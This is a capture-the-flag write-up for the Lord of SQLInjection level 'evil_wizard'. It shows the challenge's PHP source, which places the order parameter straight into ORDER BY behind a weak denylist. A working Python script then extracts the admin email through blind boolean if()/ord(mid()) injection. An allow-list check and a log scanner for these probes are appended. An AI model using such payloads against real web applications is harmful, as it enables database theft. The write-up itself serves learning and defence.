
[ LOS ] Lord of SQLInjection Level 24 Write-up (evil_wizard)
sangjun
·2022. 1. 13. 21:36
Challenge source

The challenge page renders the result table and echoes the query it ran:

```
id email score
query : select id,email,score from prob_evil_wizard where 1 order by
```
```php
<?php
include "./config.php";
login_chk();
$db = dbconnect();
// Denylist on the order parameter: blocks union/sleep/benchmark and a few keywords,
// but not if(), ord(), mid() or length().
if(preg_match('/prob|_|\.|proc|union|sleep|benchmark/i', $_GET[order])) exit("No Hack ~_~");
// The order parameter is interpolated straight into ORDER BY (the injection point).
$query = "select id,email,score from prob_evil_wizard where 1 order by {$_GET[order]}"; // same with hell_fire? really?
echo "<table border=1><tr><th>id</th><th>email</th><th>score</th>";
$rows = mysqli_query($db,$query);
while(($result = mysqli_fetch_array($rows))){
  // admin's email is masked in the output, so only the row order leaks information
  if($result['id'] == "admin") $result['email'] = "**************";
  echo "<tr><td>{$result[id]}</td><td>{$result[email]}</td><td>{$result[score]}</td></tr>";
}
echo "</table><hr>query : <strong>{$query}</strong><hr>";
$_GET[email] = addslashes($_GET[email]);
$query = "select email from prob_evil_wizard where id='admin' and email='{$_GET[email]}'";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
// Solved when the submitted email exactly matches admin's stored email
if(($result['email']) && ($result['email'] === $_GET['email'])) solve("evil_wizard");
highlight_file(__FILE__);
?>
```
Analysis and payload

1. Time-based, UNION-based and similar blind SQLi techniques don't work here (sleep, benchmark and union are filtered).
2. Use an IF inside ORDER BY to find out the email.
3. With if(condition, 1, 999999) as the sort key, admin's row comes first when the condition is true.
--> This lets us distinguish true from false.
```python
import requests
import string

URL = "https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php"
brute = string.digits + string.ascii_letters + string.punctuation
cookies = {"PHPSESSID": "kmo07vm0qujgagfi56vspjh5f8"}
passwd = ""
print(brute)
length = -1

# find passwd length
for i in range(100):
    # just doing length(pw) gives a strange result because guest's pw is 4
    query = f"""?order=if(id='admin' and length(email)={i},1,999999)"""
    response = requests.get(URL + query, cookies=cookies)
    # oracle: admin's row sorts above rubiya's only when the condition is true
    if response.text.find("<td>admin</td>") < response.text.find("<td>rubiya</td>"):
        length = i
        break
print(f"pass length is {length}")

# find passwd
for i in range(1, length + 1):
    for ch in brute:
        query = f"""?order=if(id='admin' and ord(mid(email,{i},1))={ord(ch)},1,999999)"""
        response = requests.get(URL + query, cookies=cookies)
        print(query)
        if response.text.find("<td>admin</td>") < response.text.find("<td>rubiya</td>"):
            passwd += ch
            break
print(f"passwd is {passwd}")
```
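On the defensive side, as an added example that is not part of the original write-up: the challenge's denylist never matches `if(`, `ord(`, `mid(` or `length(`, so the probes above pass straight through. An allow-list check on the order parameter, plus a scan of access-log lines for order values that fail it, catches this class of ORDER BY injection. The log lines, client addresses and the `/chall/evil_wizard.php` path are constructed for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Allow-list for the "order" parameter: a bare column of the table the page
# selects from, optionally followed by ASC/DESC. Anything else, including the
# if(...)/ord(mid(...)) probes, is rejected. The page's own denylist
# (prob|_|.|proc|union|sleep|benchmark) never matches those probes.
ORDER_RE = re.compile(r"^(id|email|score)(\s+(asc|desc))?$", re.IGNORECASE)

def is_safe_order(value: str) -> bool:
    """True only when the value is a plain column reference."""
    return ORDER_RE.fullmatch(value.strip()) is not None

# Combined-format access log line: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log (path and addresses are made up). Values are
# percent-encoded the way a browser or requests would send them.
SAMPLE_LOG = """\
10.0.0.5 - - [13/Jan/2022:21:30:01 +0900] "GET /chall/evil_wizard.php?order=score HTTP/1.1" 200 812
10.0.0.5 - - [13/Jan/2022:21:30:04 +0900] "GET /chall/evil_wizard.php?order=email%20desc HTTP/1.1" 200 812
10.0.0.9 - - [13/Jan/2022:21:31:10 +0900] "GET /chall/evil_wizard.php?order=if(id%3D%27admin%27%20and%20length(email)%3D8%2C1%2C999999) HTTP/1.1" 200 812
10.0.0.9 - - [13/Jan/2022:21:31:11 +0900] "GET /chall/evil_wizard.php?order=if(id%3D%27admin%27%20and%20ord(mid(email%2C1%2C1))%3D97%2C1%2C999999) HTTP/1.1" 200 812
"""

def scan_log(lines):
    """Return (client, decoded order value) for every request whose order
    parameter fails the allow-list. A burst of these from one client where
    only the compared number changes is the signature of the blind probe."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        params = parse_qs(urlsplit(m["path"]).query, keep_blank_values=True)
        for value in params.get("order", []):
            if not is_safe_order(value):
                hits.append((m["ip"], value))
    return hits

if __name__ == "__main__":
    for ip, value in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{ip}: suspicious order={value!r}")
```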